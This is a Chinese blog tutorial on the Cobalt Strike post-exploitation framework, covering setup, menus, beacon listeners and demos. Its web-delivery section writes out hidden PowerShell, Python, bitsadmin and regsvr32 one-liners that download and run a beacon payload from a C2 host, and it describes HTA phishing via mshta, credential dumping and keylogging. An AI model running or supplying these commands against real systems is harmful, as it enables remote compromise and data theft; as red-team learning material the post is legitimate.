CobaltStrike基础使用详解

最新推荐文章于 2024-04-26 22:03:48 发布
最新推荐文章于 2024-04-26 22:03:48 发布
阅读量3k 收藏 14
点赞数 2
分类专栏: 渗透框架 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53747497/article/details/130164962
版权

CobaltStrike简介

Cobalt Strike(简称为CS)是一款团队作战渗透测试神器,是一种可以用来进行横 向移动、数据窃取、鱼叉式钓鱼的后渗透工具,分为客户端和服务端,一个客户端可 以连接多个服务端,一个服务端也可以对应多个客户端连接。

CobaltStrike基本使用

CS安装

1.Linux安装JDK

apt search java | grep jdk 
apt install openjdk-11-jdk

2.Windows安装JDK

下载JDK: https://www.oracle.com/java/technologies/downloads/#java8-windows 
Oracle公共账号密码:http://bugmenot.com/view/oracle.com

3.环境变量配置

Java_Home => C:\Program files\jdk1.8.0_216 
CLASSPATH => .;JAVA_HOME%\lib;%JAVA_HOME\lib\tools.jar 
PATH => %JAVA_HOME%\bin;%JAVA_HOME\jre\bin
CS启动

1.启动服务端

chmod +x teamserver 
./teamserver [server_ipaddress] [password]

请添加图片描述

2.启动客户端

./cobaltstrike

Alias:别名,用户名@服务端IP地址
Host :服务端IP地址,可为域名
Port:服务端口号,默认50050,可进行修改
User:用户名,可随意填写,只要不冲突即可
Password: 登录密码,启动服务端时设置的密码

CS界面介绍

请添加图片描述

  1. Connect to team server:连接服务端
  2. Disonnect from team server:断开当前服务端连接
  3. Configure Listeners:配置监听器
  4. Show sessions in graph view:展示会话列表
  5. Show sessions in table view:展示视图列表
  6. Show targets in table view:展示目标列表
  7. Credentials:查看从靶机获取的账户密码
  8. Downloaded Files:查看从靶机下载的文件
  9. Keystrokes:查看键盘记录
  10. Screenshots:查看屏幕截图
  11. Generate Windows Executable (Stageless):生成无状态的EXE木马
  12. Setup java Signed Applet Attack:开启Web服务为自签名Java Applet提供运行 环境
  13. MS Office Macro Attack:生成OFFICE宏病毒文件
  14. Setup Scripted Web-Delivery (Stageless):开启Web服务,供下载和执行 Payload
  15. Host a file:开启Web服务,供下载文件
  16. Manage Web Server:管理Web服务
  17. Help:帮助文档 18. About:关于Cobalt Strike
CobaltStrike菜单
  1. New Connection:进行另外一个连接,支持连接多个服务器端
  2. Preferences:设置Cobal Strike界面、控制台、以及输出报告样式TeamServer 连接记录
  3. Visualization:主要展示输出结果的形式
  4. VPN Interfaces:设置VPN接口
  5. Listenrs:创建一个Listener
  6. Script Manager:脚本管理
  7. Close:退出连接
View菜单
  1. Applications:显示受害主机的应用信息,浏览器版本信息
  2. Credentials:显示所有已获取的受害主机的凭证,如使用hashdump、 Mimikatz获取到的密码凭证信息
  3. Downloads:查看已下载文件
  4. Event Log:主机上线记录以及团队协作聊天记录
  5. Keystrokes:查看键盘记录结果
  6. Proxy Pivots:查看代理模块
  7. Screenshots:查看所有屏幕截图
  8. Script Console:脚本控制台,加载第三方脚本以增强功能
  9. Targets:显示所有受害主机
  10. Web Log :所有访问Web服务的日志记录
Attack菜单

  1. packages
    • HTML Application生成(executable/VBA/powershell)这三种原理实现的恶意 HTA木马文件 (html应用程序
    • MS Office Macro:生成office宏病毒文件
    • Payload Generator:生成各种语言版本的payload(常用
    • Windows Executable:生成可执行exe木马
    • Windows Executable(Stageless):生成无状态的可执行exe木马

  2. Web Drive-by
    • Manage对开启的web服务进行管理 Clone Site:克隆网站,可以记录受害者提交的数据
    • Host File:提供一个文件下载,可以修改Mime信息
    • Scripted Web Delivery:为payload提供web服务以便下载和执行 类似于 Metasploit的web_delivery
    • Signed Applet Attack:使用java自签名的程序进行钓鱼攻击(该方式已过时)
    • Smart Applet Attack:自动检测java版本并进行攻击,针对Java 1.6.0_45以下以 及Java 1.7.0_21以下版本
    • System Profiler :用来获取一些系统信息,比如系统版本,Flash版本,浏览器 版本等
    • Spear Phish :用来邮件钓鱼的模块,鱼叉钓鱼攻击

3. Spear Phish
HTML Application:生成一个网页Payload 。三种执行模式:EXE执行、PowerShell、VBA
• Executable:是以十六进制的方式内嵌一个EXE到HTA里,运行时会把exe释放到磁 盘然后创建进程运行
• Powershell:HTA调用powershell.exe执行payload
• VBA:通过调用COM组件来执行payload(请确保目标机有Excel.Application组件否则 会运行失败,注:组件源自Office)

Windows Executable
首先是一个传输器载荷,主要用于客户端和服务的之间的连接,建立后再下载一个传输体载荷,生成可执行文件。(体积小几百k)

Windows EXE
Windows Service EXE 
Windows DLL

Windows Executable(s)
具有完成功能的beacon,生成可执行文件还有powershell以及动态链接库(大小几千k)

PowerShell 
Raw Windows EXE
Windows Service EXE 
Windows DLL

Beacon右键菜单

Access:

  1. Dump Hashes # 获取hash
  2. Elevate # 提权
  3. Golden Ticket # 生成黄金票据注入当前会话
  4. Make token # 凭证转换
  5. Run Mimikatz # 运行 Mimikatz
  6. Spawn As # 用其他用户生成Cobalt Strike侦听器

Explore:

  1. Browser Pivot # 劫持目标浏览器进程
  2. Desktop(VNC) # 桌面交互
  3. File Browser # 文件浏览器
  4. Net View # 命令Net View
  5. Port Scan # 端口扫描
  6. Process List # 进程列表
  7. Screenshot # 截图

Pivoting:

  1. SOCKS Server # 代理服务
  2. Listener # 反向端口转发
  3. Deploy VPN # 部署VPN

Spawn:外部监听器(如指派给MSF,获取meterpreter权限)

Session:

  1. Note # 备注
  2. Remove # 删除
  3. Sleep # 指定被控端休眠时间,默认60秒一次回传
  4. Exit # 退出

CobaltStrike监听器详解

Beacon介绍

Beacon是Cobalt Strike运行在目标主机上的payload,Beacon在隐蔽信道上我们提供服务,用于长期控制受感染主机。它的工作方式与Metasploit Framework Payload类似。在实际渗透过程中,我们可以将其嵌入到可执行文件、添加到Word 文档或者通过利用主机漏洞来传递Beacon。

请添加图片描述

Beacon分类

根据内置 Listener 的分类可以将Beacon进行分类, Listener 是用来接收 Beacon 请求信息的 Cobalt Strike 模块。

1.内部beacon:
• Beacon DNS
• Beacon HTTP
• Beacon HTTPS
• Beacon SMB
• Beacon TCP

2.外部beacon: 与其他工具联合使用时才会使用到,一般用来派生会话到MSF
• Foreign HTTP
• Foreign HTTPS

请添加图片描述

Name:监听器名字
Payload:选择Beacon类型
HTTP Hosts:配置HTTP Beacon回连主机地址
HTTP Host (Stager):配置分阶段payload,Stager的请求地址,仅当Payload明 确需要Stager配合时有效
HTTP Port (C2):配置HTTP Beacon回连的监听端口
Host Rotation Strategy:CS4.3新增,在 beacon 通信时,可以选择更多的轮询 方案以逃避检测、阻断, beacon 回连主机策略
Profile: Malleable C2 配置文件,用于自定义通信流量特征
HTTP Port (Bind):绑定监听端口,实现端口重定向
HTTP Host Header:设置内层真实域名,在使用域前置技术时使用
HTTP Proxy:为Payload指定代理

Beacon工作原理

Beacon HTTP/HTTPS : 以HTTP或HTTPS协议建立Beacon连接

  1. HTTP Beacon payload连接到C2控制器,它会发起一个GET请求,获取来自C2 控制器的执行操作任务
  2. 如果C2控制器有要执行的任务,那么它会响应一组包含payload执行的所有任务 的加密数据
  3. 否则HTTP Beacon payload会返回到睡眠状态,我们可以在payload配置中设置 时间周期。
  4. 当Payload执行任务后产生输出时,HTTP Beacon payload会通过一个包含加密 数据的POST请求发送给C2,这个POST请求中包含任务运行后的输出。如果没有 输出,那么就没有这个POST请求。

Beacon SMB
以SMB协议流量建立Beacon连接,适用于内网横向
SMB Beacon 使用命名管道通过父级 Beacon 进行通讯,当两个Beacons链接后,子 Beacon 从父 Beacon 获取到任务并发送。因为链接的 Beacon 使用 Windows 命名 管道进行通信,此流量封装在 SMB 协议中,所以 SMB Beacon 相对隐蔽,绕防火墙时 可能发挥奇效。

前提条件:

  1. 具有 SMB Beacon 的主机必须接受 445 端口上的连接。
  2. 只能链接由同一个 CobaltStrike 实例管理的 Beacon 。
  3. 利用这种 Beacon 横移必须有目标主机的管理员权限或者说是拥有具有管理员权 限的凭据。

功能实操演示

提供文件下载

Host File
提供一个文件下载服务,可以修改Mime信息.

请添加图片描述

请添加图片描述

浏览器访问它 : http://192.168.42.132:8012/99.html 就可以直接下载文件。请添加图片描述

托管恶意软件

Scripted Web Delivery
开启一个web服务托管payload,并根据选择的类型生成一个命令行来执行 payload 上线。

请添加图片描述

请添加图片描述

5种类型的命令,最后三个是windows系统内置的。常用的是powershell的方式,记得勾选上x64的payload。

exe:
http://172.26.2.28:807/e.exe

python:
python -c "import urllib2; exec urllib2.urlopen('http://172.26.2.28:807/a').read();"

powershell:
powershell.exe -nop -w hidden -c "IEX ((new-objectnet.webclient).downloadstring('http://172.26.2.28:808/a'))"

bitsadmin:
cmd.exe /c bitsadmin /transfer 7d0f http://172.26.2.28:807/b%APPDATA%\7d0f.exe&%APPDATA%\7d0f.exe&del %APPDATA%\7d0f.exe

regsvr32:
regsvr32 /s /n /u /i:http://172.26.2.28:807/d scrobj.dll

请添加图片描述

请添加图片描述

在目标机器上执行命令: powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.42.132:80/a’))”
执行后会发现成功上线cs。

请添加图片描述

请添加图片描述

分析目标浏览器以及版本

System Profiler

请添加图片描述

请添加图片描述

访问前先在视图里找到web log ,点击看看,然后去再去访问,会看见有日志信息,可以在里面查看到目标系统的使用的浏览器版本信息那些的,进行一个信息的收集。

请添加图片描述

hta远程上线

1.生成 HTML 应用程序(HTA)文件:Attacks > Packages > HTML Application

2.要先配置一个监听器,主要用到powershell的方式,且免杀有优点。

请添加图片描述

3.生成文件后,上传到目标机器,或者钓鱼引诱人家下载去执行,还可以利用托管文件让人下载,执行就可上线。

4.在windows里面有个内置命令 mshta ,它可以执行hta的文件,当拿到一台机器的shell可以使用它来对托管文件的下载并执行。

请添加图片描述

请添加图片描述

无阶段木马上线

1.生成一个无阶段木马,要先配置监听器,默认生成的名字是beacon.exe ,可以直接在windows系统上执行。

请添加图片描述

2.执行它,会在cs上看见它上线,而且方式是用的beacon,而不是前面的powershell类型。

请添加图片描述

00zzz
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
cobaltstrike 相关dll组件
08-14
cobaltstrike 相关dll组件
Cobalt Strike(学习笔记)
那年烟花终亦冷
06-07 2700
Cobalt Strike简介 Cobalt Strike 是一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等。 Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。 注:鉴于作为新人面试会用到这些基础知识,所以把简介也抄过来了。 安装Cobal
[渗透工具——Cobalt Strike]
个人学习参考
03-11 1009
本篇文章仅作为本人学习笔记,如有问题请各位大佬指正!选项作用新建连接设置视图(枢纽试图、会话列表、目标列表 )VPN接口Listeners监听脚本管理器Close关闭。
Cobalt Strike 的安装
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-09 1311
Cobalt Strike,是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
CobaltStrike使用教程详解基础
逍遥小哥的博客
07-14 1万+
大家好,今天简单来聊聊CobaltStrike,这是我们后渗透阶段必不可少的神器。Cobalt Strike 是一款流行的渗透测试工具,广泛用于红队操作和渗透测试。它由Raphael Mudge创立的Strategic Cyber LLC开发,并于2012年首次发布。Cobalt Strike 提供了一套功能强大的工具和框架,用于模拟网络攻击、横向移动、特权升级、持久化访问以及命令和控制等任务。它旨在帮助安全专业人员评估和改善组织的网络防御能力,同时提供了完整的红队操作平台。
【渗透工具篇】Cobalt Strike使用教程
weixin_44681307的博客
07-09 1028
这是来自于Cobalt Strike官网的介绍。Cobalt Strike 是威胁模拟软件。使用渗透测试人员可用的最强大的网络攻击套件之一对现代企业执行有针对性的攻击。这不是合规性测试。office宏,译自英文单词Macro。宏是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成宏,当在工作时,就可以直接利用事先编好的宏自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让。
Cobalt-Strike基本使用
热门推荐
m0_52233414的博客
01-31 1万+
Cobalt Strike(简称为CS)是一款基于java的渗透测试工具(尤其是后渗透阶段),自3.0开始已经不再使用Metasploit框架而作为一个独立的平台使用,这款工具有其他很多渗透测试工具没有的团队合作功能,团队成员可以连接到同一个服务器上进行合作,共享攻击资源。
黑客必备利器:如何在系统上安装和使用 CobaltStrike(简称:CS)
weixin_43263566的博客
01-11 9828
渗透测试之基本的攻击流程
Cobalt Strike 使用指南(资源整合笔记)
天在等我,菜鸟想飞
12-30 6666
0x00 写在前面的话 Cobalt Strike自出世以来,一直在红队常用的工具行列。因其优良的团队协作性,被冠以多人运动的必备利器。 本文将网络上各路神仙的经验分享以渗透流程为依据进行了一次整合,旨在提供工具的学习使用流程。 1、工具介绍 CS是什么? Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成
cobalt strike
weixin_43873557的博客
02-08 1万+
cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 metasploit是一款开源框架,armitage是metasploit框架的图形化界面方式,cobalt strike是armitage
网络安全——Cobaltstrike
weixin_54055099的博客
09-03 1万+
Cobalt Strike使用
Preload基础使用方法详解
10-15
preload 顾名思义就是一种预加载的方式,它通过声明向浏览器声明一个需要提交加载的资源,当资源真正被使用的时候立即执行,就无需等待网络的消耗
Bootstrap使用基础教程详解
09-01
Bootstrap ——来自Twitter的流行前端框架。接下来通过本文给大家介绍bootstrap入门基础脚本,包括bootstrap特征及使用方面的知识点,感兴趣的朋友一起看看吧
常见高压电塔基础知识详解
08-28
常见高压电塔基础知识详解
详解Mysql基础语法的使用
09-09
MySQL是一个关系型数据库管理系统,由瑞典MySQL AB 公司开发,目前属于 Oracle 旗下产品。这篇文章主要介绍了Mysql基础语法的使用,需要的朋友可以参考下
JavaScript基础与案例开发详解
07-22
资源名称:Javascript基础与案例开发详解内容简介:《Java script基础与案例开发详解》根据Javascript在各种类型的应用开发中(如B2B、B2C、C2C)的使用情况,有针对性地安排了丰富的案例,从基本的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8180
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全安全事件管理处置 — 安全事件处置思路指导
最新发布
享你所想
04-26 575
一、处理DDOS事件 1.准备工作 2.预防工作 3.检测与分析 4.限制、消除 5.证据收集 二、处理恶意代码事件 1.准备 2.预防 3.检测与分析 4.限制 5.证据收集 6.消除与恢复 三、处理未授权访问事件 1.准备 2.预防 3.检测与分析 4.限制、消除 5.证据收集 6.恢复 四、处理复合型安全事件 1.建议
江西公安公布多起网络安全案例
互联网安全研究院
04-22 333
因此,数据加密更能保护数据安全,加密后的数据对黑客来说没有任何价值,因此高强度数据加密是企业安全措施的必选项。因此,企业应强化实名登录等管理,做好账号密码定期更新等工作,强化验证码强制验证,加密所有敏感信息,限制或关闭敏感信息访问权限、优化系统查询验证等功能,确保关键信息安全。经查,该学校未健全全流程数据安全管理制度,未采取数据加密等相应技术措施保障数据安全,导致学校数据库被黑客非法入侵,师生个人敏感信息数据遭泄露。常见的管控技术有:访问权限管控、水印溯源管控、离职管控、加密管控、上传管控等。
cobaltstrike
07-27
CobaltStrike是一款常用的渗透测试工具,它需要在运行之前安装Java环境。具体来说,在Kali Linux上需要安装JDK11,在Windows 7上需要安装JDK1.8。\[1\]在Linux下,可以通过运行"./cobaltstrike"命令来启动CobaltStrike客户端。在启动客户端时,需要填写团队服务器的IP地址、端口号、用户名和密码。请注意,登录的用户名可以任意输入,但要确保该用户名没有被用于登录CobaltStrike服务器。\[2\]在确认信息填写无误后,点击"Connect"按钮连接到服务器。在连接过程中,会出现指纹校验对话框,用于防止篡改,每次创建CobaltStrike团队服务器时生成的指纹都是不同的。连接成功后,可以打开CobaltStrike的主页面,主页面包括菜单栏、快捷功能区、目标列表区、控制台命令输出区和控制台命令输入区。\[3\] #### 引用[.reference_title] - *1* [内网渗透工具CobaltStrike使用教程详解](https://blog.csdn.net/weixin_43847838/article/details/125069147)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Cobalt Strike(学习笔记)](https://blog.csdn.net/weixin_44947444/article/details/117669857)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值